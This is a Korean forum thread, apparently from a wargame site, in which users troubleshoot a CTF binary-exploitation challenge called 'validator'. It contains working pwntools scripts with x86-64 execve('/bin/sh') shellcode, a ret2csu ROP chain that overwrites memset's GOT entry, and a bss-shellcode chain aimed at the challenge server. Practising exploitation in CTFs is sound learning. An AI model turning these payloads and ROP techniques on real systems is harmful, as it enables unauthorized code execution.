아래는 제 exploit 코드입니다. 이 코드에서 쉘 코드를 memset got에 overwrite한 후 memset의 got으로 ret를 변조할 때 앞에 p64(0)을 7번 붙여주지 않는다면 exploit이 수행되지 않는데, 이유를 모르겠습니다.. 왜 memset got으로만 ret를 변조했을 때는 쉘을 얻지 못하지만 앞에 p64(0)을 7번 붙여준다면 쉘을 얻을 수 있는건가요? from pwn import * context.log_level = 'debug' csu_pop = 0x00000000004006EA #pop rbx pop rbp pop r12 pop r13 pop r14 pop r15 ret csu_mov = 0x00000000004006D0 #r15 -> rdx r14 -> rsi r13 -> rdi call r12+rbx*8 shellcode = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" #31byte payload = b"DREAMHACK!" arr = [] for i in range(118,0,-1): arr.append(i) payload += bytearray(arr) payload += p64(0) print(len(payload)) p = remote('host1.dreamhack.games', 8893) #p = process('./validator_dist') e = ELF('./validator_dist') bss = e.bss() def make_csu_chain(address, arg1, arg2, arg3): temp = p64(csu_pop) + p64(0) + p64(1) + address + arg1 + arg2 + arg3 + p64(csu_mov) return temp payload += make_csu_chain(p64(e.got['read']), p64(0), p64(e.got['memset']), p64(len(shellcode)+1)) payload += p64(e.got['memset']) #위 코드 대신 이 코드를 사용하면 exploit이 됨 payload += p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(e.got['memset']) p.sendline(payload) sleep(0.5) p.sendline(shellcode) p.interactive() 화면 캡처 2021-06-01 122755.png 위는 csu 코드 및 주소 입니다.

보호기법이 걸려있어서 그런건가요?? 어떤 기법이 적용되어 있는건가요??

캡처.PNG 제 GDB에는 실행 권한이 없는데, 원래 이런건가요?

local에서 진행했습니다. memset.got 주소에 shellcode를 overwrite하는 데에는 성공했습니다. 그런데 memset.got에 진입한 이후는 gdb에서 ni를 하려고 하면 계속 SIGSEGV가 뜨면서 진행이 되지 않습니다 혹시 원인이 무엇인지 아신다면 알려주세요ㅠㅠ 1.jpg 2.jpg 3.jpg

payload = b'DREAMHACK!' for i in range(118, 0, -1): payload += i.to_bytes(1, byteorder='little') payload += p64(0) 페이로드의 일부인데 맨 아래 코드(8바이트의 \x00을 넣어주는 코드)는 잘 되는데 똑같이 8 바이트의 A 를 넣어주는 payload += b'A' * 8 로 바꾸면 익스가 되지 않는데 그 이유를 모르겠습니다. 그리고 main 함수 내에서 leave 명령을 수행했을 때 저기에 있는 8바이트가 rbp에 들어가는 것이 맞나요?

원래 bss가 rwx영역이었나요??

앞서 질문을 드렸는데, 답변이 없어 새로 올립니다. bss영역에 shellcode를 넣고 마지막에 bss주소로 띄게 하여 shellcode를 획득했습니다. 그런데 서버에 시도했을 때에는 바로 성공하는데, local에서는 계속 SIGSEGV가 납니다. 이것때문에 계속 안 되는줄 알고 삽질했는데, 혹이 이게 왜 그런것일지요? [*] Process './validator_dist' stopped with exit code -11 (SIGSEGV) (pid 23803) Lv.10 anous 7일 전 (수정됨) 스택 검사하는 부분은 건너띄고, 아래 payload를 보냈습니다. shellcode = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" bss = 0x000000000060104b payload += p64(pop_rdi) payload += p64(0) # rdi payload += p64(pop_rsi_r15) payload += p64(bss) + p64(0) # rsi, r15 payload += p64(pop_rdx) payload += p64(len(shellcode)) payload += p64(read_plt) payload += p64(bss) p.send(payload) pause() p.send(shellcode) p.interactive() `

소스파일이 없는 문제는 바이너리 파일 분석으로 소스파일 형태를 유추하여 문제를 해결하여야 하나여?

validator_server와는 어떤 관계가 있는지요? 앞서 질문드린 local에서는 동작 안 하는데 server에서는 동작하는 질문에서 local에서 validator_server를 동작시키지 않았는데 이와 어떤 관련이 있는지 질문드려요

bss영역에 shellcode를 넣고 마지막에 bss주소로 띄게 하여 shellcode를 획득했습니다. 그런데 서버에 시도했을 때에는 바로 성공하는데, local에서는 계속 SIGSEGV가 납니다. 이것때문에 계속 안 되는줄 알고 삽질했는데, 혹이 이게 왜 그런것일지요? [*] Process './validator_dist' stopped with exit code -11 (SIGSEGV) (pid 23803)